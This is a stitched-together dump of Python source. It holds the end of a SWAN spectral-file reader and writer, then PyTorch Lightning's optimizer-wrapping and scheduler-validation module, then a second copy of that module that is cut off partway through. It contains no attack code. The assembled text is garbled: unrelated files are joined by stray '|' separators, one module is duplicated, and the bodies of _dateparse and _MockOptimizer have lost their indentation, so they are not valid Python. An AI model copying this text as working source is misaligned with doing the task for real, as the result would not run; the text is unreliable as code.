            Sout.append(Snew / self.units_factor)
        return Sout

    def readall(self):
        """Read the entire file."""
        while True:
            sset = self.read()
            if sset:
                yield sset
            else:
                break

    def write_header(self, time=False, str1="", str2="", timecode=1, excval=-99):
        """Write header to file.

        Fixed-width SWAN header: 40-char keyword field + description.
        """
        # Description
        strout = "{:40}{}\n".format("SWAN 1", "Swan standard spectral file")
        strout += "{:4}{}\n".format("$", str1)
        strout += "{:4}{}\n".format("$", str2)
        # Time
        if time:
            strout += "{:40}{}\n".format("TIME", "time-dependent data")
            strout += "{:>6d}{:34}{}\n".format(timecode, "", "time coding option")
        # Location
        strout += "{:40}{}\n".format("LONLAT", "locations in spherical coordinates")
        strout += "{:>6d}{:34}{}\n".format(len(self.x), "", "number of locations")
        for x, y in zip(self.x, self.y):
            strout += "{:2}{:<0.6f}{:2}{:<0.6f}\n".format("", x, "", y)
        # Frequency
        strout += "{:40}{}\n".format("AFREQ", "absolute frequencies in Hz")
        strout += "{:6d}{:34}{}\n".format(len(self.freqs), "", "number of frequencies")
        for freq in self.freqs:
            strout += "{:>11.5f}\n".format(freq)
        # Direction
        strout += "{:40}{}\n".format("NDIR", "spectral nautical directions in degr")
        strout += "{:6d}{:34}{}\n".format(len(self.dirs), "", "number of directions")
        for wdir in self.dirs:
            strout += "{:>11.4f}\n".format(wdir)
        # Data
        strout += "QUANT\n{:>6d}{:34}{}\n".format(
            1, "", "number of quantities in table"
        )
        strout += "{:40}{}\n".format("VaDens", "variance densities in m2/Hz/degr")
        strout += "{:40}{}\n".format("m2/Hz/degr", "unit")
        strout += "{:3}{:<37g}{}\n".format("", excval, "exception value")
        # Dumping
        self.fid.write(strout)

    def write_spectra(self, arr, time=None):
        """Write spectra from single timestamp.

        Args:
            arr (3D ndarray): spectra to write S(site, freq, dim).
            time (yyymmdd.HHMMSS): time of spectra to write.
        """
        if time is not None:
            self.fid.write(f"{time:40}{'date and time'}\n")
        for spec in arr:
            # Scale so the largest value fits the 5-char integer format.
            fac = spec.max() / 9998.0
            if np.isnan(fac):
                # max() is NaN only when the spectrum contains NaN.
                self.fid.write("NODATA\n")
            elif fac <= 0:
                self.fid.write("ZERO\n")
            else:
                self.fid.write(f"FACTOR\n{'':4}{fac:0.8E}\n")
                np.savetxt(self.fid, spec / fac, fmt="%5.0f", delimiter="")

    def close(self):
        """Close file handle."""
        if self.fid:
            self.fid.close()
        self.fid = False
def read_tab(filename, toff=0):
    """Read swan table file.

    Args:
        filename (str): name of SWAN tab file to read
        toff (float): timezone offset in hours

    Returns:
        Pandas DataFrame object
    """
    # NOTE(review): `delim_whitespace` is deprecated and `date_parser` was
    # removed in pandas >= 2.0 — confirm the pinned pandas version.
    df = pd.read_csv(
        filename,
        delim_whitespace=True,
        skiprows=[0, 1, 2, 3, 5, 6],  # SWAN tab banner/header lines
        parse_dates=[0],
        date_parser=_dateparse,
        index_col=0,
    )
    df.index.name = attrs.TIMENAME
    # Apply the timezone offset by shifting the index in whole hours.
    df.index = df.index.shift(toff, freq="1H")
    # Column labels are offset by one relative to the data: each column is
    # renamed to its right-hand neighbour's label and the last column is
    # dropped — presumably to realign headers; verify against file layout.
    for col1, col2 in zip(df.columns[-1:0:-1], df.columns[-2::-1]):
        df = df.rename(columns={col2: col1})
    return df.iloc[:, 0:-1]
def _dateparse(x):
"""Date parsing to read SWAN tab files."""
return datetime.datetime.strptime(x, "%Y%m%d.%H%M%S")
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from dataclasses import fields
from typing import Any, Callable, Dict, Generator, List, Optional, Tuple, Union
from weakref import proxy
import torch
from torch import optim
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.rank_zero import rank_zero_warn
from pytorch_lightning.utilities.types import _Stateful, LRSchedulerConfig, LRSchedulerTypeTuple, ReduceLROnPlateau
def do_nothing_closure() -> None:
    """No-op closure substituted when ``optimizer.step`` is called without one."""
    return None
class LightningOptimizer:
    """This class is used to wrap the user optimizers and handle properly the backward and optimizer_step logic
    across accelerators, AMP, accumulate_grad_batches."""

    def __init__(self, optimizer: Optimizer):
        # copy most of the `Optimizer` methods into this instance. `__del__` is skipped in case the optimizer has
        # implemented custom logic which we would not want to call on destruction of the `LightningOptimizer`
        self.__dict__ = {k: v for k, v in optimizer.__dict__.items() if k not in ("step", "__del__")}
        # For Horovod
        if hasattr(optimizer, "skip_synchronize"):
            # Dynamically subclass this wrapper together with the optimizer's
            # base class so `isinstance` checks against the wrapped optimizer
            # type keep working on the wrapper.
            self.__class__ = type(
                "Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__.__bases__[0]), {}
            )
            self.skip_synchronize = optimizer.skip_synchronize
            self.synchronize = optimizer.synchronize
        else:
            self.__class__ = type("Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__), {})
        self._optimizer = optimizer
        # Populated by `_to_lightning_optimizer`; held as a weakref proxy.
        self._strategy: Optional[pl.strategies.Strategy] = None
        self._optimizer_idx = 0

    @property
    def optimizer(self) -> Optimizer:
        # The wrapped `torch.optim.Optimizer` instance.
        return self._optimizer

    @classmethod
    def _to_lightning_optimizer(
        cls, optimizer: Union[Optimizer, "LightningOptimizer"], strategy: "pl.strategies.Strategy", opt_idx: int
    ) -> "LightningOptimizer":
        """Wrap ``optimizer`` (unless already wrapped) and attach the strategy and index."""
        if isinstance(optimizer, LightningOptimizer):
            # the user could return a `LightningOptimizer` from `configure_optimizers`, see test:
            # tests/core/test_lightning_optimizer.py::test_lightning_optimizer[False]
            lightning_optimizer = optimizer
        else:
            lightning_optimizer = cls(optimizer)
        # weakref proxy avoids a reference cycle between optimizer and strategy.
        lightning_optimizer._strategy = proxy(strategy)
        lightning_optimizer._optimizer_idx = opt_idx
        return lightning_optimizer

    @contextmanager
    def toggle_model(self, sync_grad: bool = True) -> Generator[None, None, None]:
        """This function is just a helper for advanced users.

        Considering the current optimizer as A and all other optimizers as B.
        Toggling means all parameters from B exclusive to A will have ``requires_grad`` set to False.

        When performing gradient accumulation, there is no need to perform grad synchronization
        during the accumulation phase.
        Setting `sync_grad` to False will block this synchronization and improve performance.
        """
        # local import here to avoid circular import
        from pytorch_lightning.loops.utilities import _block_parallel_sync_behavior

        assert self._strategy is not None
        lightning_module = self._strategy.lightning_module
        assert lightning_module is not None
        with _block_parallel_sync_behavior(self._strategy, block=(not sync_grad)):
            lightning_module.toggle_optimizer(self, self._optimizer_idx)
            yield
            # Restore `requires_grad` flags when the caller's block exits.
            lightning_module.untoggle_optimizer(self._optimizer_idx)

    def step(self, closure: Optional[Callable[[], Any]] = None, **kwargs: Any) -> None:
        """Performs a single optimization step (parameter update).

        Args:
            closure: An optional optimizer_closure.
            kwargs: Any additional arguments to the ``optimizer.step()`` call.

        Example::

            # Scenario for a GAN using manual optimization
            def training_step(...):
                opt_gen, opt_dis = self.optimizers()

                ...

                # compute generator loss
                loss_gen = self.compute_generator_loss(...)
                # zero_grad needs to be called before backward
                opt_gen.zero_grad()
                self.manual_backward(loss_gen)
                opt_gen.step()

                # compute discriminator loss
                loss_dis = self.compute_discriminator_loss(...)

                # zero_grad needs to be called before backward
                opt_dis.zero_grad()
                self.manual_backward(loss_dis)
                opt_dis.step()


            # A more advanced example
            def training_step(self, batch, batch_idx, ...):
                opt_gen, opt_dis = self.optimizers()

                ...
                accumulated_grad_batches = batch_idx % 2 == 0

                # compute generator loss
                def closure_gen():
                    loss_gen = self.compute_generator_loss(...)
                    self.manual_backward(loss_gen)
                    if accumulated_grad_batches:
                        opt_gen.zero_grad()

                with opt_gen.toggle_model(sync_grad=accumulated_grad_batches):
                    opt_gen.step(closure=closure_gen)

                def closure_dis():
                    loss_dis = self.compute_discriminator_loss(...)
                    self.manual_backward(loss_dis)
                    if accumulated_grad_batches:
                        opt_dis.zero_grad()

                with opt_dis.toggle_model(sync_grad=accumulated_grad_batches):
                    opt_dis.step(closure=closure_dis)
        """
        if closure is None:
            # Substitute a no-op so the strategy can call the closure unconditionally.
            closure = do_nothing_closure
            profiler_action = "optimizer_step_without_closure"
        elif not callable(closure):
            raise MisconfigurationException("When `optimizer.step(closure)` is called, the closure should be callable")
        else:
            profiler_action = "optimizer_step_with_closure"
        # Suffix the profiler action with this optimizer's index so multiple
        # optimizers are profiled separately.
        profiler_action += f"_{self._optimizer_idx}"

        assert self._strategy is not None
        assert self._strategy.lightning_module is not None
        # Delegate the actual step to the strategy (handles AMP, accumulation, ...).
        with self._strategy.lightning_module.trainer.profiler.profile(profiler_action):
            self._strategy.optimizer_step(self._optimizer, self._optimizer_idx, closure, **kwargs)
def _init_optimizers_and_lr_schedulers(
    model: "pl.LightningModule",
) -> Tuple[List[Optimizer], List[LRSchedulerConfig], List[int]]:
    """Calls `LightningModule.configure_optimizers` and parses and validates the output."""
    optim_conf = model.trainer._call_lightning_module_hook("configure_optimizers", pl_module=model)

    if optim_conf is None:
        rank_zero_warn(
            "`LightningModule.configure_optimizers` returned `None`, this fit will run with no optimizer",
        )
        # Substitute a no-op optimizer so the training loop machinery still works.
        optim_conf = _MockOptimizer()

    optimizers, lr_schedulers, optimizer_frequencies, monitor = _configure_optimizers(optim_conf)
    # Scheduler parsing differs by optimization mode: manual optimization
    # ignores interval/frequency/monitor keys (the user steps schedulers).
    lr_scheduler_configs = (
        _configure_schedulers_automatic_opt(lr_schedulers, monitor)
        if model.automatic_optimization
        else _configure_schedulers_manual_opt(lr_schedulers)
    )
    _set_scheduler_opt_idx(optimizers, lr_scheduler_configs)
    _validate_scheduler_api(lr_scheduler_configs, model)
    return optimizers, lr_scheduler_configs, optimizer_frequencies
def _configure_optimizers(
    optim_conf: Union[Dict[str, Any], List, Optimizer, Tuple]
) -> Tuple[List, List, List, Optional[str]]:
    """Normalize the output of ``configure_optimizers`` into flat lists.

    Accepts every documented return shape of ``configure_optimizers`` and
    returns ``(optimizers, lr_schedulers, optimizer_frequencies, monitor)``.
    The branch ORDER below is significant: list-of-dicts must be tested
    before list-of-optimizers, and the two-list form before either.
    """
    optimizers, lr_schedulers, optimizer_frequencies = [], [], []
    monitor = None

    # single output, single optimizer
    if isinstance(optim_conf, Optimizer):
        optimizers = [optim_conf]
    # two lists, optimizer + lr schedulers
    elif (
        isinstance(optim_conf, (list, tuple))
        and len(optim_conf) == 2
        and isinstance(optim_conf[0], list)
        and all(isinstance(opt, Optimizer) for opt in optim_conf[0])
    ):
        opt, sch = optim_conf
        optimizers = opt
        lr_schedulers = sch if isinstance(sch, list) else [sch]
    # single dictionary
    elif isinstance(optim_conf, dict):
        _validate_optim_conf(optim_conf)
        optimizers = [optim_conf["optimizer"]]
        # `monitor` is only meaningful for ReduceLROnPlateau schedulers.
        monitor = optim_conf.get("monitor", None)
        lr_schedulers = [optim_conf["lr_scheduler"]] if "lr_scheduler" in optim_conf else []
    # multiple dictionaries
    elif isinstance(optim_conf, (list, tuple)) and all(isinstance(d, dict) for d in optim_conf):
        for opt_dict in optim_conf:
            _validate_optim_conf(opt_dict)
        optimizers = [opt_dict["optimizer"] for opt_dict in optim_conf]
        # Tag each scheduler with the index of the optimizer dict it came from.
        scheduler_dict = (
            lambda scheduler, opt_idx: dict(scheduler, opt_idx=opt_idx)
            if isinstance(scheduler, dict)
            else {"scheduler": scheduler, "opt_idx": opt_idx}
        )

        lr_schedulers = [
            scheduler_dict(opt_dict["lr_scheduler"], opt_idx)
            for opt_idx, opt_dict in enumerate(optim_conf)
            if "lr_scheduler" in opt_dict
        ]
        optimizer_frequencies = [
            opt_dict["frequency"] for opt_dict in optim_conf if opt_dict.get("frequency", None) is not None
        ]
        # assert that if frequencies are present, they are given for all optimizers
        if optimizer_frequencies and len(optimizer_frequencies) != len(optimizers):
            raise ValueError("A frequency must be given to each optimizer.")
    # single list or tuple, multiple optimizer
    elif isinstance(optim_conf, (list, tuple)) and all(isinstance(opt, Optimizer) for opt in optim_conf):
        optimizers = list(optim_conf)
    # unknown configuration
    else:
        raise MisconfigurationException(
            "Unknown configuration for model optimizers."
            " Output from `model.configure_optimizers()` should be one of:\n"
            " * `Optimizer`\n"
            " * [`Optimizer`]\n"
            " * ([`Optimizer`], [`_LRScheduler`])\n"
            ' * {"optimizer": `Optimizer`, (optional) "lr_scheduler": `_LRScheduler`}\n'
            ' * A list of the previously described dict format, with an optional "frequency" key (int)'
        )
    return optimizers, lr_schedulers, optimizer_frequencies, monitor
def _configure_schedulers_automatic_opt(schedulers: list, monitor: Optional[str]) -> List[LRSchedulerConfig]:
    """Convert each scheduler into `LRSchedulerConfig` with relevant information, when using automatic
    optimization.

    Args:
        schedulers: raw scheduler entries (dicts or bare schedulers) as
            returned by ``_configure_optimizers``.
        monitor: metric key given at the top level of the optimizer config,
            required by bare ``ReduceLROnPlateau`` schedulers.

    Returns:
        One validated ``LRSchedulerConfig`` per input scheduler.
    """
    lr_scheduler_configs = []
    for scheduler in schedulers:
        if isinstance(scheduler, dict):
            # check provided keys: anything not a LRSchedulerConfig field is dropped.
            supported_keys = {field.name for field in fields(LRSchedulerConfig)}
            extra_keys = scheduler.keys() - supported_keys
            if extra_keys:
                rank_zero_warn(
                    f"Found unsupported keys in the lr scheduler dict: {extra_keys}."
                    " HINT: remove them from the output of `configure_optimizers`.",
                    category=RuntimeWarning,
                )
                scheduler = {k: v for k, v in scheduler.items() if k in supported_keys}
            if "scheduler" not in scheduler:
                raise MisconfigurationException(
                    'The lr scheduler dict must have the key "scheduler" with its item being an lr scheduler'
                )
            if "interval" in scheduler and scheduler["interval"] not in ("step", "epoch"):
                # FIX: the original interpolated scheduler['interval'] with the
                # same quote character as the enclosing f-string — a SyntaxError
                # on Python < 3.12 (quote reuse only arrived with PEP 701).
                # Hoisting into a local sidesteps the quoting entirely.
                interval = scheduler["interval"]
                raise MisconfigurationException(
                    'The "interval" key in lr scheduler dict must be "step" or "epoch"'
                    f' but is "{interval}"'
                )
            scheduler["reduce_on_plateau"] = isinstance(scheduler["scheduler"], optim.lr_scheduler.ReduceLROnPlateau)
            if scheduler["reduce_on_plateau"] and scheduler.get("monitor", None) is None:
                raise MisconfigurationException(
                    "The lr scheduler dict must include a monitor when a `ReduceLROnPlateau` scheduler is used."
                    ' For example: {"optimizer": optimizer, "lr_scheduler":'
                    ' {"scheduler": scheduler, "monitor": "your_loss"}}'
                )
            is_one_cycle = isinstance(scheduler["scheduler"], optim.lr_scheduler.OneCycleLR)
            if is_one_cycle and scheduler.get("interval", "epoch") == "epoch":
                # OneCycleLR is normally stepped per batch, not per epoch.
                rank_zero_warn(
                    "A `OneCycleLR` scheduler is using 'interval': 'epoch'."
                    " Are you sure you didn't mean 'interval': 'step'?",
                    category=RuntimeWarning,
                )
            config = LRSchedulerConfig(**scheduler)
        elif isinstance(scheduler, ReduceLROnPlateau):
            if monitor is None:
                raise MisconfigurationException(
                    "`configure_optimizers` must include a monitor when a `ReduceLROnPlateau`"
                    " scheduler is used. For example:"
                    ' {"optimizer": optimizer, "lr_scheduler": scheduler, "monitor": "metric_to_track"}'
                )
            config = LRSchedulerConfig(scheduler, reduce_on_plateau=True, monitor=monitor)
        else:
            # Bare scheduler: wrap with all-default configuration.
            config = LRSchedulerConfig(scheduler)
        lr_scheduler_configs.append(config)
    return lr_scheduler_configs
def _configure_schedulers_manual_opt(schedulers: list) -> List[LRSchedulerConfig]:
    """Convert each scheduler into `LRSchedulerConfig` structure with relevant information, when using manual
    optimization."""
    lr_scheduler_configs = []
    for scheduler in schedulers:
        if isinstance(scheduler, dict):
            # In manual optimization the user steps schedulers themselves, so
            # automatic-mode keys are meaningless and silently dropped (with a warning).
            invalid_keys = {"interval", "frequency", "reduce_on_plateau", "monitor", "strict"}
            keys_to_warn = [k for k in scheduler.keys() if k in invalid_keys]

            if keys_to_warn:
                rank_zero_warn(
                    f"The lr scheduler dict contains the key(s) {keys_to_warn}, but the keys will be ignored."
                    " You need to call `lr_scheduler.step()` manually in manual optimization.",
                    category=RuntimeWarning,
                )

            config = LRSchedulerConfig(**{key: scheduler[key] for key in scheduler if key not in invalid_keys})
        else:
            # Bare scheduler: wrap with default configuration.
            config = LRSchedulerConfig(scheduler)
        lr_scheduler_configs.append(config)
    return lr_scheduler_configs
def _validate_scheduler_api(lr_scheduler_configs: List[LRSchedulerConfig], model: "pl.LightningModule") -> None:
    """Check every configured scheduler is stateful and follows a supported API.

    Raises:
        TypeError: if a scheduler lacks ``state_dict``/``load_state_dict``
            (required for checkpointing).
        MisconfigurationException: if a scheduler is not a known PyTorch
            scheduler type and the user has not overridden
            ``LightningModule.lr_scheduler_step`` to drive it.
    """
    for config in lr_scheduler_configs:
        scheduler = config.scheduler
        if not isinstance(scheduler, _Stateful):
            raise TypeError(
                f"The provided lr scheduler `{scheduler.__class__.__name__}` is invalid."
                " It should have `state_dict` and `load_state_dict` methods defined."
            )

        if not isinstance(scheduler, LRSchedulerTypeTuple) and not is_overridden("lr_scheduler_step", model):
            raise MisconfigurationException(
                f"The provided lr scheduler `{scheduler.__class__.__name__}` doesn't follow PyTorch's LRScheduler"
                " API. You should override the `LightningModule.lr_scheduler_step` hook with your own logic if"
                " you are using a custom LR scheduler."
            )
def _set_scheduler_opt_idx(optimizers: List[Optimizer], lr_scheduler_configs: List[LRSchedulerConfig]) -> None:
    """Match each scheduler to the optimizer it wraps and record that index.

    Raises:
        MisconfigurationException: if a user-supplied ``opt_idx`` disagrees
            with the actual optimizer position, or if a scheduler's optimizer
            was not returned from ``configure_optimizers`` at all.
    """
    for config in lr_scheduler_configs:
        for opt_idx, opt in enumerate(optimizers):
            # Identity comparison: the scheduler must wrap this exact optimizer.
            if config.scheduler.optimizer is opt:
                if config.opt_idx is not None and config.opt_idx != opt_idx:
                    raise MisconfigurationException(
                        "`opt_idx` set inside scheduler config does not match with the index"
                        " of the respective optimizer returned from `configure_optimizers`."
                    )

                config.opt_idx = opt_idx
                break
        else:
            # for/else: runs only when no optimizer matched (no `break`).
            raise MisconfigurationException(
                "Some schedulers are attached with an optimizer that wasn't returned from `configure_optimizers`."
            )
def _validate_optim_conf(optim_conf: Dict[str, Any]) -> None:
    """Warn (without raising) about unrecognized keys in an optimizer config dict."""
    valid_keys = {"optimizer", "lr_scheduler", "frequency", "monitor"}
    extra_keys = optim_conf.keys() - valid_keys
    if extra_keys:
        rank_zero_warn(
            f"Found unsupported keys in the optimizer configuration: {set(extra_keys)}", category=RuntimeWarning
        )
class _MockOptimizer(Optimizer):
"""The `_MockOptimizer` will be used inplace of an optimizer in the event that `None` is returned from
`configure_optimizers`."""
def __init__(self) -> None:
super().__init__([torch.zeros(1)], {})
def add_param_group(self, param_group: Dict[Any, Any]) -> None:
pass # Do Nothing
def load_state_dict(self, state_dict: Dict[Any, Any]) -> None:
pass # Do Nothing
def state_dict(self) -> Dict[str, Any]:
return {} # Return Empty
def step(self, closure: Callable = None) -> None:
if closure is not None:
closure()
def zero_grad(self, set_to_none: Optional[bool] = False) -> None:
pass # Do Nothing
def __repr__(self) -> str:
return "No Optimizer"
| # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from dataclasses import fields
from typing import Any, Callable, Dict, Generator, List, Optional, Tuple, Union
from weakref import proxy
import torch
from torch import optim
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.rank_zero import rank_zero_warn
from pytorch_lightning.utilities.types import _Stateful, LRSchedulerConfig, LRSchedulerTypeTuple, ReduceLROnPlateau
def do_nothing_closure() -> None:
    """Placeholder closure used when the caller supplies none."""
    pass
class LightningOptimizer:
    """This class is used to wrap the user optimizers and handle properly the backward and optimizer_step logic
    across accelerators, AMP, accumulate_grad_batches."""

    def __init__(self, optimizer: Optimizer):
        # copy most of the `Optimizer` methods into this instance. `__del__` is skipped in case the optimizer has
        # implemented custom logic which we would not want to call on destruction of the `LightningOptimizer`
        self.__dict__ = {k: v for k, v in optimizer.__dict__.items() if k not in ("step", "__del__")}
        # For Horovod
        if hasattr(optimizer, "skip_synchronize"):
            # Dynamically subclass this wrapper together with the optimizer's
            # base class so `isinstance` checks against the wrapped optimizer
            # type keep working on the wrapper.
            self.__class__ = type(
                "Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__.__bases__[0]), {}
            )
            self.skip_synchronize = optimizer.skip_synchronize
            self.synchronize = optimizer.synchronize
        else:
            self.__class__ = type("Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__), {})
        self._optimizer = optimizer
        # Populated by `_to_lightning_optimizer`; held as a weakref proxy.
        self._strategy: Optional[pl.strategies.Strategy] = None
        self._optimizer_idx = 0

    @property
    def optimizer(self) -> Optimizer:
        # The wrapped `torch.optim.Optimizer` instance.
        return self._optimizer

    @classmethod
    def _to_lightning_optimizer(
        cls, optimizer: Union[Optimizer, "LightningOptimizer"], strategy: "pl.strategies.Strategy", opt_idx: int
    ) -> "LightningOptimizer":
        """Wrap ``optimizer`` (unless already wrapped) and attach the strategy and index."""
        if isinstance(optimizer, LightningOptimizer):
            # the user could return a `LightningOptimizer` from `configure_optimizers`, see test:
            # tests/core/test_lightning_optimizer.py::test_lightning_optimizer[False]
            lightning_optimizer = optimizer
        else:
            lightning_optimizer = cls(optimizer)
        # weakref proxy avoids a reference cycle between optimizer and strategy.
        lightning_optimizer._strategy = proxy(strategy)
        lightning_optimizer._optimizer_idx = opt_idx
        return lightning_optimizer

    @contextmanager
    def toggle_model(self, sync_grad: bool = True) -> Generator[None, None, None]:
        """This function is just a helper for advanced users.

        Considering the current optimizer as A and all other optimizers as B.
        Toggling means all parameters from B exclusive to A will have ``requires_grad`` set to False.

        When performing gradient accumulation, there is no need to perform grad synchronization
        during the accumulation phase.
        Setting `sync_grad` to False will block this synchronization and improve performance.
        """
        # local import here to avoid circular import
        from pytorch_lightning.loops.utilities import _block_parallel_sync_behavior

        assert self._strategy is not None
        lightning_module = self._strategy.lightning_module
        assert lightning_module is not None
        with _block_parallel_sync_behavior(self._strategy, block=(not sync_grad)):
            lightning_module.toggle_optimizer(self, self._optimizer_idx)
            yield
            # Restore `requires_grad` flags when the caller's block exits.
            lightning_module.untoggle_optimizer(self._optimizer_idx)

    def step(self, closure: Optional[Callable[[], Any]] = None, **kwargs: Any) -> None:
        """Performs a single optimization step (parameter update).

        Args:
            closure: An optional optimizer_closure.
            kwargs: Any additional arguments to the ``optimizer.step()`` call.

        Example::

            # Scenario for a GAN using manual optimization
            def training_step(...):
                opt_gen, opt_dis = self.optimizers()

                ...

                # compute generator loss
                loss_gen = self.compute_generator_loss(...)
                # zero_grad needs to be called before backward
                opt_gen.zero_grad()
                self.manual_backward(loss_gen)
                opt_gen.step()

                # compute discriminator loss
                loss_dis = self.compute_discriminator_loss(...)

                # zero_grad needs to be called before backward
                opt_dis.zero_grad()
                self.manual_backward(loss_dis)
                opt_dis.step()


            # A more advanced example
            def training_step(self, batch, batch_idx, ...):
                opt_gen, opt_dis = self.optimizers()

                ...
                accumulated_grad_batches = batch_idx % 2 == 0

                # compute generator loss
                def closure_gen():
                    loss_gen = self.compute_generator_loss(...)
                    self.manual_backward(loss_gen)
                    if accumulated_grad_batches:
                        opt_gen.zero_grad()

                with opt_gen.toggle_model(sync_grad=accumulated_grad_batches):
                    opt_gen.step(closure=closure_gen)

                def closure_dis():
                    loss_dis = self.compute_discriminator_loss(...)
                    self.manual_backward(loss_dis)
                    if accumulated_grad_batches:
                        opt_dis.zero_grad()

                with opt_dis.toggle_model(sync_grad=accumulated_grad_batches):
                    opt_dis.step(closure=closure_dis)
        """
        if closure is None:
            # Substitute a no-op so the strategy can call the closure unconditionally.
            closure = do_nothing_closure
            profiler_action = "optimizer_step_without_closure"
        elif not callable(closure):
            raise MisconfigurationException("When `optimizer.step(closure)` is called, the closure should be callable")
        else:
            profiler_action = "optimizer_step_with_closure"
        # Suffix the profiler action with this optimizer's index so multiple
        # optimizers are profiled separately.
        profiler_action += f"_{self._optimizer_idx}"

        assert self._strategy is not None
        assert self._strategy.lightning_module is not None
        # Delegate the actual step to the strategy (handles AMP, accumulation, ...).
        with self._strategy.lightning_module.trainer.profiler.profile(profiler_action):
            self._strategy.optimizer_step(self._optimizer, self._optimizer_idx, closure, **kwargs)
def _init_optimizers_and_lr_schedulers(
    model: "pl.LightningModule",
) -> Tuple[List[Optimizer], List[LRSchedulerConfig], List[int]]:
    """Calls `LightningModule.configure_optimizers` and parses and validates the output."""
    optim_conf = model.trainer._call_lightning_module_hook("configure_optimizers", pl_module=model)

    if optim_conf is None:
        rank_zero_warn(
            "`LightningModule.configure_optimizers` returned `None`, this fit will run with no optimizer",
        )
        # Substitute a no-op optimizer so the training loop machinery still works.
        optim_conf = _MockOptimizer()

    optimizers, lr_schedulers, optimizer_frequencies, monitor = _configure_optimizers(optim_conf)
    # Scheduler parsing differs by optimization mode: manual optimization
    # ignores interval/frequency/monitor keys (the user steps schedulers).
    lr_scheduler_configs = (
        _configure_schedulers_automatic_opt(lr_schedulers, monitor)
        if model.automatic_optimization
        else _configure_schedulers_manual_opt(lr_schedulers)
    )
    _set_scheduler_opt_idx(optimizers, lr_scheduler_configs)
    _validate_scheduler_api(lr_scheduler_configs, model)
    return optimizers, lr_scheduler_configs, optimizer_frequencies
def _configure_optimizers(
    optim_conf: Union[Dict[str, Any], List, Optimizer, Tuple]
) -> Tuple[List, List, List, Optional[str]]:
    """Normalize the output of `configure_optimizers` into parallel lists.

    Returns (optimizers, lr_schedulers, optimizer_frequencies, monitor).
    NOTE: the branch order below matters — e.g. the two-list `(opts, scheds)`
    form must be tested before the generic list-of-optimizers form.
    """
    optimizers, lr_schedulers, optimizer_frequencies = [], [], []
    monitor = None
    # single output, single optimizer
    if isinstance(optim_conf, Optimizer):
        optimizers = [optim_conf]
    # two lists, optimizer + lr schedulers
    elif (
        isinstance(optim_conf, (list, tuple))
        and len(optim_conf) == 2
        and isinstance(optim_conf[0], list)
        and all(isinstance(opt, Optimizer) for opt in optim_conf[0])
    ):
        opt, sch = optim_conf
        optimizers = opt
        lr_schedulers = sch if isinstance(sch, list) else [sch]
    # single dictionary
    elif isinstance(optim_conf, dict):
        _validate_optim_conf(optim_conf)
        optimizers = [optim_conf["optimizer"]]
        monitor = optim_conf.get("monitor", None)
        lr_schedulers = [optim_conf["lr_scheduler"]] if "lr_scheduler" in optim_conf else []
    # multiple dictionaries
    elif isinstance(optim_conf, (list, tuple)) and all(isinstance(d, dict) for d in optim_conf):
        for opt_dict in optim_conf:
            _validate_optim_conf(opt_dict)
        optimizers = [opt_dict["optimizer"] for opt_dict in optim_conf]
        # Tag each scheduler with the index of the optimizer dict it came from.
        scheduler_dict = (
            lambda scheduler, opt_idx: dict(scheduler, opt_idx=opt_idx)
            if isinstance(scheduler, dict)
            else {"scheduler": scheduler, "opt_idx": opt_idx}
        )
        lr_schedulers = [
            scheduler_dict(opt_dict["lr_scheduler"], opt_idx)
            for opt_idx, opt_dict in enumerate(optim_conf)
            if "lr_scheduler" in opt_dict
        ]
        optimizer_frequencies = [
            opt_dict["frequency"] for opt_dict in optim_conf if opt_dict.get("frequency", None) is not None
        ]
        # assert that if frequencies are present, they are given for all optimizers
        if optimizer_frequencies and len(optimizer_frequencies) != len(optimizers):
            raise ValueError("A frequency must be given to each optimizer.")
    # single list or tuple, multiple optimizer
    elif isinstance(optim_conf, (list, tuple)) and all(isinstance(opt, Optimizer) for opt in optim_conf):
        optimizers = list(optim_conf)
    # unknown configuration
    else:
        raise MisconfigurationException(
            "Unknown configuration for model optimizers."
            " Output from `model.configure_optimizers()` should be one of:\n"
            " * `Optimizer`\n"
            " * [`Optimizer`]\n"
            " * ([`Optimizer`], [`_LRScheduler`])\n"
            ' * {"optimizer": `Optimizer`, (optional) "lr_scheduler": `_LRScheduler`}\n'
            ' * A list of the previously described dict format, with an optional "frequency" key (int)'
        )
    return optimizers, lr_schedulers, optimizer_frequencies, monitor
def _configure_schedulers_automatic_opt(schedulers: list, monitor: Optional[str]) -> List[LRSchedulerConfig]:
    """Convert each scheduler into `LRSchedulerConfig` with relevant information, when using automatic
    optimization.

    Accepts raw scheduler objects or scheduler dicts; dict entries are validated
    (supported keys, `interval` values, required `monitor` for ReduceLROnPlateau).
    """
    lr_scheduler_configs = []
    for scheduler in schedulers:
        if isinstance(scheduler, dict):
            # check provided keys
            supported_keys = {field.name for field in fields(LRSchedulerConfig)}
            extra_keys = scheduler.keys() - supported_keys
            if extra_keys:
                rank_zero_warn(
                    f"Found unsupported keys in the lr scheduler dict: {extra_keys}."
                    " HINT: remove them from the output of `configure_optimizers`.",
                    category=RuntimeWarning,
                )
                # Drop unsupported keys instead of failing.
                scheduler = {k: v for k, v in scheduler.items() if k in supported_keys}
            if "scheduler" not in scheduler:
                raise MisconfigurationException(
